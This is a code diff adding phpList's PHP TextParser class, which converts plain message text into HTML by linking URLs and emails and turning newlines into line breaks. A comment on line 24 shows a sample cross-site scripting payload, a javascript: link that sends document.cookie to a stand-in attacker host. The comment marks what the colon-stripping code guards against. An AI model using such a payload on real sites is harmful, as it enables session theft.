|
| 1 | +<?php |
| 2 | + |
| 3 | +declare(strict_types=1); |
| 4 | + |
| 5 | +namespace PhpList\Core\Domain\Messaging\Service; |
| 6 | + |
| 7 | +class TextParser |
| 8 | +{ |
| 9 | + public function __invoke(string $text): string |
| 10 | + { |
| 11 | + // bug in PHP? get rid of newlines at the beginning of text |
| 12 | + $text = ltrim($text); |
| 13 | + |
| 14 | + // make urls and emails clickable |
| 15 | + $text = preg_replace("/([\._a-z0-9-]+@[\.a-z0-9-]+)/i", '<a href="mailto:\\1" class="email">\\1</a>', $text); |
| 16 | + $link_pattern = "/(.*)<a.*href\s*=\s*\"(.*?)\"\s*(.*?)>(.*?)<\s*\/a\s*>(.*)/is"; |
| 17 | + |
| 18 | + $i = 0; |
| 19 | + while (preg_match($link_pattern, $text, $matches)) { |
| 20 | + $url = $matches[2]; |
| 21 | + $rest = $matches[3]; |
| 22 | + if (!preg_match('/^(http:)|(mailto:)|(ftp:)|(https:)/i', $url)) { |
| 23 | + // avoid this |
| 24 | + //<a href="javascript:window.open('http://hacker.com?cookie='+document.cookie)"> |
| 25 | + $url = preg_replace('/:/', '', $url); |
| 26 | + } |
| 27 | + $link[$i] = '<a href="'.$url.'" '.$rest.'>'.$matches[4].'</a>'; |
| 28 | + $text = $matches[1]."%%$i%%".$matches[5]; |
| 29 | + ++$i; |
| 30 | + } |
| 31 | + |
| 32 | + $text = preg_replace("/(www\.[a-zA-Z0-9\.\/#~:?+=&%@!_\\-]+)/i", 'http://\\1', $text); //make www. -> http://www. |
| 33 | + $text = preg_replace("/(https?:\/\/)http?:\/\//i", '\\1', $text); //take out duplicate schema |
| 34 | + $text = preg_replace("/(ftp:\/\/)http?:\/\//i", '\\1', $text); //take out duplicate schema |
| 35 | + $text = preg_replace("/(https?:\/\/)(?!www)([a-zA-Z0-9\.\/#~:?+=&%@!_\\-]+)/i", |
| 36 | + '<a href="\\1\\2" class="url" target="_blank">\\2</a>', |
| 37 | + $text); //eg-- http://kernel.org -> <a href"http://kernel.org" target="_blank">http://kernel.org</a> |
| 38 | + |
| 39 | + $text = preg_replace("/(https?:\/\/)(www\.)([a-zA-Z0-9\.\/#~:?+=&%@!\\-_]+)/i", |
| 40 | + '<a href="\\1\\2\\3" class="url" target="_blank">\\2\\3</a>', |
| 41 | + $text); //eg -- http://www.google.com -> <a href"http://www.google.com" target="_blank">www.google.com</a> |
| 42 | + |
| 43 | + // take off a possible last full stop and move it outside |
| 44 | + $text = preg_replace("/<a href=\"(.*?)\.\" class=\"url\" target=\"_blank\">(.*)\.<\/a>/i", |
| 45 | + '<a href="\\1" class="url" target="_blank">\\2</a>.', $text); |
| 46 | + |
| 47 | + for ($j = 0; $j < $i; ++$j) { |
| 48 | + $replacement = $link[$j]; |
| 49 | + $text = preg_replace("/\%\%$j\%\%/", $replacement, $text); |
| 50 | + } |
| 51 | + |
| 52 | + // hmm, regular expression choke on some characters in the text |
| 53 | + // first replace all the brackets with placeholders. |
| 54 | + // we cannot use htmlspecialchars or addslashes, because some are needed |
| 55 | + |
| 56 | + $text = str_replace("\(", '<!--LB-->', $text); |
| 57 | + $text = str_replace("\)", '<!--RB-->', $text); |
| 58 | + $text = preg_replace('/\$/', '<!--DOLL-->', $text); |
| 59 | + |
| 60 | + // @@@ to be xhtml compabible we'd have to close the <p> as well |
| 61 | + // so for now, just make it two br/s, which will be done by replacing |
| 62 | + // \n with <br/> |
| 63 | + // $paragraph = '<p class="x">'; |
| 64 | + $br = '<br />'; |
| 65 | + $text = preg_replace("/\r/", '', $text); |
| 66 | + $text = preg_replace("/\n/", "$br\n", $text); |
| 67 | + |
| 68 | + // reverse our previous placeholders |
| 69 | + $text = str_replace('<!--LB-->', '(', $text); |
| 70 | + $text = str_replace('<!--RB-->', ')', $text); |
| 71 | + return str_replace('<!--DOLL-->', '$', $text); |
| 72 | + } |
| 73 | +} |
0 commit comments